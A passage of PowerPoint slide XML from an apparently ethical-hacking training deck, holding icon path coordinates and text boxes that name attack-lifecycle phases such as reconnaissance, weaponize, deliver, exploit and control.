              <a:gd name="connsiteY63" fmla="*/ 617019 h 1754137"/>
              <a:gd name="connsiteX64" fmla="*/ 1307387 w 1544262"/>
              <a:gd name="connsiteY64" fmla="*/ 693600 h 1754137"/>
              <a:gd name="connsiteX65" fmla="*/ 1226900 w 1544262"/>
              <a:gd name="connsiteY65" fmla="*/ 693314 h 1754137"/>
              <a:gd name="connsiteX66" fmla="*/ 1160607 w 1544262"/>
              <a:gd name="connsiteY66" fmla="*/ 693600 h 1754137"/>
              <a:gd name="connsiteX67" fmla="*/ 1113458 w 1544262"/>
              <a:gd name="connsiteY67" fmla="*/ 656643 h 1754137"/>
              <a:gd name="connsiteX68" fmla="*/ 1160987 w 1544262"/>
              <a:gd name="connsiteY68" fmla="*/ 619115 h 1754137"/>
              <a:gd name="connsiteX69" fmla="*/ 1307767 w 1544262"/>
              <a:gd name="connsiteY69" fmla="*/ 619020 h 1754137"/>
              <a:gd name="connsiteX70" fmla="*/ 1338248 w 1544262"/>
              <a:gd name="connsiteY70" fmla="*/ 658834 h 1754137"/>
              <a:gd name="connsiteX71" fmla="*/ 1307387 w 1544262"/>
              <a:gd name="connsiteY71" fmla="*/ 693600 h 175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544262" h="1754137">
                <a:moveTo>
                  <a:pt x="1345391" y="613209"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1342439" y="610352"/>
                  <a:pt x="1339296" y="607780"/>
                  <a:pt x="1336057" y="605208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1345391" y="525579"/>
                  <a:pt x="1340533" y="445855"/>
                  <a:pt x="1338057" y="366131"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1321579" y="157724"/>
                  <a:pt x="1135270" y="-6202"/>
                  <a:pt x="946199" y="180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="819611" y="4466"/>
                  <a:pt x="692739" y="-1630"/>
                  <a:pt x="566246" y="3038"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="398130" y="9229"/>
                  <a:pt x="240396" y="148770"/>
                  <a:pt x="211726" y="315362"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194771" y="414041"/>
                  <a:pt x="203058" y="514149"/>
                  <a:pt x="206582" y="613781"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="194200" y="616448"/>
                  <a:pt x="182008" y="619686"/>
                  <a:pt x="169530" y="621591"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55421" y="639308"/>
                  <a:pt x="2367" y="699315"/>
                  <a:pt x="1223" y="812758"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="747" y="863431"/>
                  <a:pt x="3033" y="914295"/>
                  <a:pt x="461" y="964872"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1348" y="999257"/>
                  <a:pt x="11892" y="1009068"/>
                  <a:pt x="44181" y="1007068"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80471" y="1004877"/>
                  <a:pt x="117048" y="1006211"/>
                  <a:pt x="153433" y="1007163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="183341" y="1007925"/>
                  <a:pt x="209630" y="1020117"/>
                  <a:pt x="208678" y="1052979"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207725" y="1084887"/>
                  <a:pt x="182198" y="1097270"/>
                  <a:pt x="151718" y="1097460"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113713" y="1097651"/>
                  <a:pt x="75518" y="1099270"/>
                  <a:pt x="37704" y="1096984"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7796" y="1095174"/>
                  <a:pt x="-2301" y="1106985"/>
                  <a:pt x="842" y="1135275"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2271" y="1147752"/>
                  <a:pt x="2176" y="1160706"/>
                  <a:pt x="842" y="1173279"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-2206" y="1202331"/>
                  <a:pt x="9796" y="1212618"/>
                  <a:pt x="38752" y="1211093"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78281" y="1209093"/>
                  <a:pt x="117905" y="1210808"/>
                  <a:pt x="157529" y="1210903"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="187723" y="1210903"/>
                  <a:pt x="208297" y="1227572"/>
                  <a:pt x="208773" y="1255671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209250" y="1284722"/>
                  <a:pt x="188008" y="1300152"/>
                  <a:pt x="157910" y="1300152"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119905" y="1300152"/>
                  <a:pt x="81710" y="1302152"/>
                  <a:pt x="43895" y="1299771"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11320" y="1297676"/>
                  <a:pt x="-3634" y="1308058"/>
                  <a:pt x="747" y="1342062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2367" y="1354540"/>
                  <a:pt x="2081" y="1367494"/>
                  <a:pt x="842" y="1380067"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1825" y="1406642"/>
                  <a:pt x="8938" y="1416929"/>
                  <a:pt x="35894" y="1415786"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73804" y="1414167"/>
                  <a:pt x="111904" y="1415310"/>
                  <a:pt x="149908" y="1415786"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="181151" y="1416167"/>
                  <a:pt x="210964" y="1424835"/>
                  <a:pt x="208487" y="1461887"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="206201" y="1495701"/>
                  <a:pt x="178769" y="1507131"/>
                  <a:pt x="146384" y="1506559"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111523" y="1505892"/>
                  <a:pt x="76566" y="1508083"/>
                  <a:pt x="41800" y="1505988"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11892" y="1504178"/>
                  <a:pt x="557" y="1512655"/>
                  <a:pt x="176" y="1545040"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-1444" y="1680200"/>
                  <a:pt x="69803" y="1753923"/>
                  <a:pt x="207058" y="1754018"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="581010" y="1754209"/>
                  <a:pt x="954962" y="1754114"/>
                  <a:pt x="1328818" y="1754114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1474169" y="1754114"/>
                  <a:pt x="1544083" y="1684200"/>
                  <a:pt x="1544178" y="1538373"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1544369" y="1318155"/>
                  <a:pt x="1544178" y="1097841"/>
                  <a:pt x="1544178" y="877623"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1544369" y="688171"/>
                  <a:pt x="1523414" y="660358"/>
                  <a:pt x="1345391" y="613209"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="388891" y="693695"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="338313" y="692362"/>
                  <a:pt x="287735" y="692076"/>
                  <a:pt x="237253" y="693791"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="208773" y="694743"/>
                  <a:pt x="203058" y="681980"/>
                  <a:pt x="203439" y="656834"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="203820" y="633212"/>
                  <a:pt x="205915" y="616829"/>
                  <a:pt x="236015" y="618924"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="264304" y="620924"/>
                  <a:pt x="292879" y="619305"/>
                  <a:pt x="321358" y="619305"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="343456" y="619305"/>
                  <a:pt x="365650" y="620162"/>
                  <a:pt x="387748" y="619020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="414322" y="617686"/>
                  <a:pt x="431944" y="619972"/>
                  <a:pt x="432039" y="655595"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="432134" y="690076"/>
                  <a:pt x="416704" y="694457"/>
                  <a:pt x="388891" y="693695"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="905908" y="1263195"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="847615" y="1310058"/>
                  <a:pt x="838852" y="1360541"/>
                  <a:pt x="845900" y="1422548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="851520" y="1471507"/>
                  <a:pt x="834089" y="1484556"/>
                  <a:pt x="786084" y="1482270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="699882" y="1478174"/>
                  <a:pt x="699692" y="1481223"/>
                  <a:pt x="699692" y="1383115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="707598" y="1344253"/>
                  <a:pt x="695691" y="1310344"/>
                  <a:pt x="650542" y="1278149"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="573295" y="1222905"/>
                  <a:pt x="567961" y="1097079"/>
                  <a:pt x="630349" y="1027737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="702930" y="947060"/>
                  <a:pt x="817230" y="937821"/>
                  <a:pt x="892668" y="1006592"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="970297" y="1077267"/>
                  <a:pt x="984013" y="1200425"/>
                  <a:pt x="905908" y="1263195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="904384" y="617019"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="763605" y="618162"/>
                  <a:pt x="622825" y="615590"/>
                  <a:pt x="482140" y="618353"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="439088" y="619210"/>
                  <a:pt x="428229" y="605780"/>
                  <a:pt x="430420" y="564917"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="433659" y="505005"/>
                  <a:pt x="430706" y="444807"/>
                  <a:pt x="430420" y="384704"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="430991" y="384609"/>
                  <a:pt x="431373" y="384419"/>
                  <a:pt x="431944" y="384228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="431467" y="384228"/>
                  <a:pt x="430991" y="384133"/>
                  <a:pt x="430515" y="384133"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="450327" y="280691"/>
                  <a:pt x="505953" y="228971"/>
                  <a:pt x="611014" y="225732"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="718456" y="222398"/>
                  <a:pt x="826183" y="222494"/>
                  <a:pt x="933626" y="225637"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1046783" y="228971"/>
                  <a:pt x="1110696" y="296312"/>
                  <a:pt x="1113934" y="409374"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1115744" y="470810"/>
                  <a:pt x="1116220" y="532342"/>
                  <a:pt x="1117173" y="593778"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1117267" y="600255"/>
                  <a:pt x="1117363" y="606637"/>
                  <a:pt x="1117458" y="613114"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1117458" y="613114"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1046592" y="622448"/>
                  <a:pt x="975345" y="616448"/>
                  <a:pt x="904384" y="617019"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="1307387" y="693600"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1280621" y="692076"/>
                  <a:pt x="1253761" y="693314"/>
                  <a:pt x="1226900" y="693314"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1204802" y="693314"/>
                  <a:pt x="1182705" y="692552"/>
                  <a:pt x="1160607" y="693600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1133841" y="694838"/>
                  <a:pt x="1113172" y="696648"/>
                  <a:pt x="1113458" y="656643"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1113743" y="617305"/>
                  <a:pt x="1133936" y="618543"/>
                  <a:pt x="1160987" y="619115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1209851" y="620067"/>
                  <a:pt x="1258905" y="620734"/>
                  <a:pt x="1307767" y="619020"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1339677" y="617876"/>
                  <a:pt x="1337486" y="637403"/>
                  <a:pt x="1338248" y="658834"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1339010" y="681313"/>
                  <a:pt x="1334057" y="695124"/>
                  <a:pt x="1307387" y="693600"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>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015053B9-C415-12EB-DA06-81711BF1C92B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="4714094" y="3819603"/>
            <a:ext cx="1404749" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PASSIVE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15631F1B-A127-34FD-CC72-DA0CC4CF8E9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6084434" y="3776211"/>
            <a:ext cx="1404749" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACTIVE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1547012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Why Businesses Need Ethical Hackers | Certified Ethical Hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09B78F41-3003-DAF5-65B9-73D26DCB0902}"/>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422318" y="514354"/>
            <a:ext cx="11573197" cy="724247"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ATTACK LIFECYCLE (MITRE PHASE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C764B49E-C1B8-4637-A382-31B55D998655}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="794762" y="3727744"/>
            <a:ext cx="10332000" cy="96391"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="50000"/>
              <a:lumOff val="5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Oval 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{111150F9-7F06-4C77-8B30-44A86B25F715}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1321606" y="3645912"/>
            <a:ext cx="261716" cy="261716"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8595513D-D3EA-4FB0-A4AE-FBF7343CDAFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422318" y="2888527"/>
            <a:ext cx="2060293" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Info Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Oval 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03778983-9DCA-4F53-A3A1-11ACAAAB3451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3796981" y="3621190"/>
            <a:ext cx="261716" cy="261716"/>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5" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2479A752-0D5F-4169-943B-697ABBB10780}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2939301" y="3144006"/>
            <a:ext cx="1965494" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Deliver</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{519F6B78-9CF0-4E2C-B385-C1EA691BE863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6563669" y="3635312"/>
            <a:ext cx="261716" cy="261716"/>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21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FBC111F-A111-488E-8F1A-1853EDE45769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5686549" y="3144006"/>
            <a:ext cx="2015957" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Control</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7423F3-768C-4CD1-847E-79EED30FC91D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2568682" y="3663825"/>
            <a:ext cx="261716" cy="261716"/>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27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABF4984A-621C-451A-A9CD-8DA45C12E22F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1822816" y="4052646"/>
            <a:ext cx="1909823" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Weaponize</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Oval 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{113A7903-F910-4136-9ACA-87A877D4A2A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5204512" y="3662474"/>
            <a:ext cx="261716" cy="261716"/>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33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73EB1827-1226-46A4-8988-5071421A2F50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409485" y="4047159"/>
            <a:ext cx="1758534" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591967CD-60A6-EA0B-E6A2-DB94A05629C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422318" y="2395864"/>
            <a:ext cx="2060293" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
